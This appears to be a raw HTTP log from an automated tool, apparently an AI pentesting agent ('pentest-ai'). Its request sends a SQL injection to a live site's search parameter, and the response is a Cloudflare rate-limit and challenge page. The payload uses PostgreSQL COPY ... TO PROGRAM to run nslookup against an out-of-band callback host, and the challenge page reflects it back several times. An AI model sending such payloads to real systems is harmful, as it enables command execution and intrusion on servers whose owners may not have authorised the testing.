REQUEST:
GET https://my.myfirst.tech/search?category=%27%3B%20COPY%20%28SELECT%20%27%27%29%20TO%20PROGRAM%20%27nslookup%20h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9685
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84770da42a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=VYLHMvmqPPU3pL8iWkZ%2Bb0REUmH6btipF0D63YBV4n2iXPodGloWprV1p4ehfrMern35KgndROlAbmvmvIh8x8T11UD%2B62k6D0b%2F8Q1%2FO3J6c9WcqDsnIJjoPGmou0i8nQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84770da42a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'XqbAV5NyKyBijdRUjMC06BeFcCU5nFVPAemhz4mW4YA-1784281162-1.2.1.1-h4B_LwosrSn11S0QJd9X0ylajnSlZ3gqRqQCjg2PNAutMZTUZctmVOWBJkSljS94',cITimeS: '1784281162',cRay: 'a1c84770da42a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?category=%27%3B+COPY+%28SELECT+%27%27%29+TO+PROGRAM+%27nslookup+h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%3B--+-\u0026__cf_chl_tk=4HBiLS8y1SXgXAdmb7X5BHOoAk7RgZNz.osX.w0_pM8-1784281162-1.0.1.1-NivtMqA6DZKKgI2xjlZd_vH_SWtxHwoHERw_egIkhjU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?category=%27%3B+COPY+%28SELECT+%27%27%29+TO+PROGRAM+%27nslookup+h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%3B--+-\u0026__cf_chl_f_tk=4HBiLS8y1SXgXAdmb7X5BHOoAk7RgZNz.osX.w0_pM8-1784281162-1.0.1.1-NivtMqA6DZKKgI2xjlZd_vH_SWtxHwoHERw_egIkhjU",md: '.AgfmyiQ_Q73lpVfTgKRgdN3.cZzqaQswnlNpw2snJc-1784281162-1.2.1.1-bIRzeLcMEMuTuT5bQ82BtjkxzN8TgHRHF1rUtDrpzzrTI0kyk1nnjJ_VIudikG2.YbDwycpg22DJP8Aqmi.gmu0BYYKoZVWQ6n2uhGvYzeR1JTTWtF1YtefAICeyb7wZNWG.F4dmwALxulYhvr4lKJnhsAlOdgsggsUpYKtPCS845z6QO3MaL6dLV37LKrf2ZEt4M4ikInlQ4o6yonS.ED3BLb5TPtMN3PIP96dThegNkKDU2u4ItBxytR3PJ2G9330bOf7FyRVfWeOLQLBoqvdbEgr2sZO5oTRLwVSpIphewZA6rtBWo4li80TMBl1NlKEDagKbo6c94HI9gLQzQjsAJ0Ua7i6ZRtzOHF9BHAJkh.GXJO2AjazLXe_G98fbwJ8VrHAhmy2zjTft8e9XlRaJP421wl0lOFZs5FNsNWTi7GJvroBeU8uygwiYT_Xa..Dz9suONoFiBSwxrrkV4b4IJeaj13RZL8L6OTFDw43xpK1zytp4KRcpxcMPiaDuvqlpjHgPmpVZ7CP.97sT_faXoD.qmKaRePjEyb.QaFL38KkY80do12Z9KLjeS9eFyQSb.vhBwiRD149Fc14Z4S0KxlrihVNAk0.c0h1uHM7tS58gSGbc7qiHZQ_lpn57IiGpxw2wwRepJyn1XxvmaMHbvAWutrRiIvX9ZRPY56oxEl92e1qmXRUv9dbDaoQM1ImUjzs8rAcARk7D6So8u_mc6Q7o_qQ5i5j56iI5oPeiXW018WMvnREzEDt1nZQ1Dm5k5W1.mMd8s6hIuIjrd36.AiQctU1xZfE3PWDCs56Vf0E_DmjQmFcobdLVeQMPPU2.MclBZwRk2vMscWzERuY4yMPjKe5Dz4jzVbW4sUYL.WGUjeF9h.KJES1GMoxbyMTLUM21ucu3ZoLpDeUK2tJUyf4TzXy9ktZLCoNzmJAM3us5rp85CTcuAwvpSMUQL4ywUGmA_rmOQrk3OfVIOmduk0enSSyyzbDrJTK6p5AYuqv6W.hshlj7_iTIwj.vwL6gb8EV_A9Q7pPEr_paiN5xygRbCqkmmUgA66uu.BkeGhBK60k_3JHBgLpYPnDv7ezmRRasj.RZqA5ZpjQmQRvoq.JhPAD.wRwbBkt5VfMUSWh9hw_vm.NRgjKZPso8l9VHj0RnN5UVce6GpeLC8bOk_W1pkGlH2X0ohdcpRrjtaTsMBCpnMvPLx3OLjv0ylqmeVPToNzVEXt5Ag.2R6l7P_2EEpr.cC4IPKKFZDl6VIKumXX5wZIyoB5n9ufX0Y_Ajd7h8nAROS8CYnn8EMw',mdrd: 'E2LWnNv8DPftSo3BxfkNEE9hp3HnWsD4RzgruEBP6Bg-1784281162-1.2.1.1-hx3dT1M7pe_AqKGHlB0TXDZNGdr8hwlFQaxtKU0.nlA.VUyzSmSK4gWHG2n.uNV8cUEPU4rLKOeD3HBa__7ZelL4TpnbhPY4bWhyQGDcEZWrJWLPP8mziSMtA4j5ksCvhdt9G..YSShxU6KrnPb5hyx06nwgjtsRWq7VvfzdEfn.H9Lng9xVmEsdAEjtsJqgtmBz_.ps9UXzvqK1mf3C7XXktJloAP3kHldaUVz_BGDX7cktbn4gAiuYS9eDDsbG',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84770da42a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?category=%27%3B+COPY+%28SELECT+%27%27%29+TO+PROGRAM+%27nslookup+h0cqg45t8jh21623dc0z89uhe68k4sj2t.oast.fun%27%3B--+-\u0026__cf_chl_rt_tk=4HBiLS8y1SXgXAdmb7X5BHOoAk7RgZNz.osX.w0_pM8-1784281162-1.0.1.1-NivtMqA6DZKKgI2xjlZd_vH_SWtxHwoHERw_egIkhjU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
